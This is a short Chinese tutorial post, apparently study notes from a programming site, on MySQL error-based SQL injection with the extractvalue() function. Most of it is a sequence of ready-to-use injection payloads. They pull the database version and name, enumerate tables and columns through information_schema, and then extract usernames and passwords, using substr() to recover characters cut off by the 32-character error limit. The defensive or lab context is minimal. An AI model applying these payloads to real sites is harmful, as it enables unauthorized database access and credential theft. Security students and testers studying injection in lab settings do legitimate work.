数据库笔记3
2021/6/21 19:29:36
本文主要是介绍数据库笔记3,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
报错注入
通过ExtractValue报错
and extractvalue(1,(payload)) //两个参数第一个参数是字符串格式,第二个参数是Xpath格式的字符串,如果格式不符合会报错
and extractvalue(1,concat(0x7e,(select@@version),0x7e))
输出的时候如果第二个参数加了payload且格式出错,那么extractvalue就会把第二个参数相应的payload执行的信息报错出来
select * from users where id =1 and extractvalue(1,concat(0x23,database(),0x23))
通过concat字符串拼接函数拼接#号,既让页面报错也让database()解析
select * from users where id =1 and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema=‘baji’ limit 0,1),0x23))
查询数据库为baji的表名
select * from users where id =1 and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=‘baji’ and table_name=‘users’ limit 0,1),0x23))
查询数据库为baji表名为users中的字段
select * from users where id =1 and extractvalue(1,concat(0x23,(select username from users limit 0,1),0x23))
得到用户名
select * from users where id =1 and extractvalue(1,concat(0x23,(select password from users limit 0,1),0x23))
得到密码,但是此时的密码是不完整的,缺了一位 因为只能显示32位
此时可以用substr(str,1,1)函数 第一个参数是要截取的字符串,第二个参数是截取的开始位置,弟三个参数是截取的长度
select * from users where id =1 and extractvalue(1,concat(0x23,substr((select password from users limit 0,1),32,1),0x23))
这篇关于数据库笔记3的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-23Springboot应用的多环境打包入门
- 2024-11-23Springboot应用的生产发布入门教程
- 2024-11-23Python编程入门指南
- 2024-11-23Java创业入门:从零开始的编程之旅
- 2024-11-23Java创业入门:新手必读的Java编程与创业指南
- 2024-11-23Java对接阿里云智能语音服务入门详解
- 2024-11-23Java对接阿里云智能语音服务入门教程
- 2024-11-23JAVA对接阿里云智能语音服务入门教程
- 2024-11-23Java副业入门:初学者的简单教程
- 2024-11-23JAVA副业入门:初学者的实战指南